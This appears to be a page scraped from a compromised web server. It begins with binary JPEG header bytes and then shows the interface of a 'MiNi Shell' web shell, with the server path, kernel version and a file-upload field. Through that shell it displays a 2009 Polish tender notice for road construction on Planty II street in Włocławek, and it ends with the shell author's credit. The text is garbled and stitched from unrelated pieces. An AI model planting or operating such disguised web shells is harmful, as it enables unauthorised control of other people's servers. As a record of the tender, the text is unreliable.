JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090205/18376-N-2009.html

<p class="kh_header"><b>Włocławek: Budowa ul. Planty II na odcinku od ul. Wiejskiej do ul. Kapitulnej wraz z infrastrukturą towarzyszącą</b><br>
<b>Numer ogłoszenia: 18376 - 2009; data zamieszczenia: 05.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg , ul. Zielna 13/21, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4121323, faks 054 4121323.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ul. Planty II na odcinku od ul. Wiejskiej do ul. Kapitulnej wraz z infrastrukturą towarzyszącą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia objęto budowę ul. Planty II na odcinku od ul. Wiejskiej do 
ul. Kapitulnej wraz z infrastrukturą towarzyszącą.
Ulica Planty zlokalizowana jest na terenie miasta Włocławka w granicach administracyjnych osiedla mieszkaniowego POŁUDNIE. Zakres opracowania zawiera się pomiędzy ulicami Kapitulną i Wiejską. 
Na odcinku objętym projektem ulica przebiega przez teren o częściowo zwartej zabudowie zlokalizowanej po stronie prawej a natomiast po stronie lewej zlokalizowane są niezagospodarowane działki. Ulica Planty zaliczona jest do drogi kategorii gminnej.
Zakres robót obejmuje:
-przebudowę skrzyżowania Planty II - Wiejska
-przebudowę skrzyżowania Planty II - Kapitulna 
-budowę jezdni ulicy Planty II o nawierzchni utwardzonej na odcinku od skrzyżowania z ul. Wiejską do skrzyżowania z ul. Kapitulną o dł.  ok. 0,56 km 
-budowę chodników obustronnych wzdłuż przedmiotowej ulicy 
-budowę dwukierunkowej ścieżki rowerowej wzdłuż przedmiotowej ulicy 
-budowę zjazdów do posesji zlokalizowanych wzdłuż przedmiotowej ulicy 
-budowę odcinka ul. Guzowskiej wraz z przyległymi chodnikami 
-budowę fragmentu kanalizacji deszczowej (cześć została zrealizowana w roku 2007 wg zakresu wskazanego powyżej) 
-budowę/przebudowę oświetlenia ulicznego wzdłuż przedmiotowej ulicy 
-nasadzenie  krzewów oraz wykonanie pasów zieleni o zmiennej szerokości  
-wykonanie oznakowania pionowego i poziomego
-niezbędne przebudowy istniejącej infrastruktury technicznej wynikające z kolizji z projektowanym układem drogowym.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 45000,- zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają określone 
w art. 22 ust. 1 ustawy i nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy , a w szczególności:
1.1.Wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej:
1 zadanie o wartości min. 2mln PLN (brutto) odpowiadające swoim rodzajem robotom budowlanym będącym przedmiotem zamówienia: budowa albo przebudowa drogi. 
1.2.	Dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia tych osób (posiadającymi wszystkie wymagane polskim prawem uprawnienia niezbędne do realizacji przedmiotu zamówienia w zakresie powierzonych im funkcji). Wykonawca przedstawi w ofercie osoby na każdą z wymienionych niżej funkcji, spełniające  przy tym następujące wymagania:
1.2.1.	Kierownik budowy - minimum 1 osoba, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w branży drogowej; co najmniej 5 lat doświadczenia w branży drogowej na stanowisku kierownika robót lub kierownika budowy.
1.2.2.	kierownik robót branży elektrycznej - minimum 1 osoba, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w branży elektrycznej; co najmniej 3 lata doświadczenia w branży elektrycznej na stanowisku kierownika robót.
1.2.3.	kierownik robót branży sanitarnej - minimum 1 osoba, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w branży sanitarnej; co najmniej 3 lata doświadczenia w branży sanitarnej na stanowisku kierownika robót.

 Liczba osób wskazanych do realizacji zamówienia nie może być mniejsza od   
 wymaganej przez Zamawiającego. Jedna osoba nie może wykonywać dwóch  
 czynności na dwóch stanowiskach, za wyjątkiem kierownika budowy, który    
 będzie sprawować funkcję kierownika robót drogowych   

 Przez doświadczenie zawodowe dla stanowisk, gdzie wymagane są   
 uprawnienia budowlane rozumie się lata czynne zawodowo od daty  
 uzyskania uprawnień budowlanych w realizacji podobnych robót przy  
 budowie (przebudowie) dróg. Do doświadczenia zawodowego na danym  
 stanowisku nie zalicza się okresu zatrudnienia danej osoby na innych 
 budowach w tym samym okresie.

1.3	Posiadają niezbędne do wykonania narzędzia i urządzenia - wg tabeli 
            lub przedstawią pisemne zobowiązanie innych podmiotów do ich udostępnienia:	
Koparka samojezdna- szt 1;
Zagęszczarka lub ubijak spalinowy 200 kg- szt 1;
Wytwórnia do wytwarzania mieszanek mineralno-asfaltowych-szt 1;
Rozkładarka mas bitumicznych z możliwością układania masy na szer. 7m (zagęszczanie min. 70 %)- szt 1;
Skrapiarka samojezdna z pompą- szt 1;
Walce stalowe, walec gumowy- szt	2+1;
Szczotka mechaniczna-szt 1;
Samochody samowyładowcze o ładowności min. 10 Mg -w ilościach zapewniających ciągłość pracy;
Piła do cięcia asfaltu -szt 1;
Laboratorium stałe lub udokumentowany dostęp do usług laboratoryjnych-szt 1

Spełnienie tego warunku nie zwalnia wyłonionego Wykonawcy z obowiązku zapewnienia pozostałego sprzętu niezbędnego do prawidłowego i terminowego zrealizowania zadania.

1.4	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.;
1.4.1	Wykonawca/wykonawcy wspólnie ubiegający się o udzielnie zamówienia osiągnęli przychód netto ze sprzedaży za ostatni rok obrotowy, a jeżeli okres prowadzenia działalności jest krótszy, za ten okres, w wysokości nie mniejszej niż: 10mln PLN (netto)
1.4.2	Wykonawca/wykonawcy ubiegający się o udzielenie zamówienia posiadają środki finansowe lub zdolność kredytową w wysokości 2mln PLN, tzn. dopuszczalne jest tu wykazanie przez Wykonawcę/wykonawców środków własnych lub środków z kredytu obrotowego lub kredytu odnawialnego lub innego kredytu, o ile te środki finansowe nie są przeznaczone na zrealizowanie konkretnego celu lub promesy kredytowej lub zdolności kredytowej we wskazanej wysokości.
1.4.3	Wykonawca/Wykonawcy wspólnie ubiegający się o udzielenie zamówienia są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 1mln PLN,
W przypadku przedstawienia w ofercie dokumentów finansowych sporządzonych w walucie innej niż złoty,  stosownego przeliczenia na złote - według tabeli średnich kursów walut obcych NBP z dnia publikacji niniejszego ogłoszenia o postępowaniu w Biuletynie Zamówień Publicznych - dokona komisja przetargowa podczas badania złożonych ofert.

Ocena spełniania warunków udziału w postępowaniu wykonawców zostanie dokonana w oparciu o dokumenty, o których mowa w punkcie 2.2.1.-2.2.17 specyfikacji.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy:

2.2.1.	Oświadczenie Wykonawcy - wypełnione i podpisane odpowiednio przez osoby upoważnione do reprezentowania Wykonawcy albo przez Pełnomocnika reprezentującego Wykonawców wspólnie ubiegających się 
o udzielenie zamówienia - załącznik nr 3
2.2.2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
2.2.3.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
2.2.4.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust 1 pkt 4 - 8 Ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2.2.5.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,

W celu potwierdzenia spełniania warunku posiadanej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:

2.2.6.	wykaz wykonanych robót budowlanych sporządzony wg wzoru stanowiącego załącznik nr 6 do SIWZ, oraz dokument potwierdzający, że roboty te zostały wykonane należycie,
2.2.7.	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w   realizacji przedmiotu zamówienia, sporządzony według wzoru stanowiącego załącznik nr 4 do SIWZ wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Wymagane jest przedłożenie dokumentów potwierdzających, że przewidziany do realizacji niniejszego zamówienia personel posiada odpowiednie uprawnienia budowlane, stwierdzające przygotowanie zawodowe oraz aktualny dokument potwierdzający przynależność do właściwej izby samorządu zawodowego.
2.2.8.	wykaz narzędzi, którymi dysponuje lub będzie dysponował wykonawca   niezbędnych do  realizacji przedmiotu zamówienia - wg załącznika nr 5


W celu potwierdzenia spełniania warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia

2.2.9.	sprawozdanie finansowe, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, inny dokument określający obroty (przychody netto ze sprzedaży), zobowiązania i należności - za okres ostatniego roku obrotowego, a jeżeli okres działalności jest krótszy, to za ten okres;
2.2.10.	informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, 
w których wykonawca posiada rachunek, potwierdzające, że wysokość posiadanych środków finansowych lub zdolność kredytowa Wykonawcy, jest nie mniejsza niż określona w  pkt 1.4.2 SIWZ, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
2.2.11.	polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

Oraz
2.2.12.	Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz oferty według wzoru stanowiącego załącznik nr 1 do SIWZ,
2.2.13.	Pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu o udzielenie zamówienia 
i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej.
2.2.14.	Dowód wpłaty wadium
2.2.15.	Harmonogram rzeczowo - finansowy wg wzoru stanowiącego załącznik nr 7 do SIWZ
2.2.16.	Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Kosztorys ofertowy -  załącznik nr 2.
2.2.17.	Wykaz stawek i narzutów - załącznik nr 8..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzdwloclawek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg ul. Zielna13/21, 87-800 Włocławek.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 10:00, miejsce: Miejski Zarząd Dróg ul. Zielna13/21, 87-800 Włocławek, sekretariat pokój nr 5.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com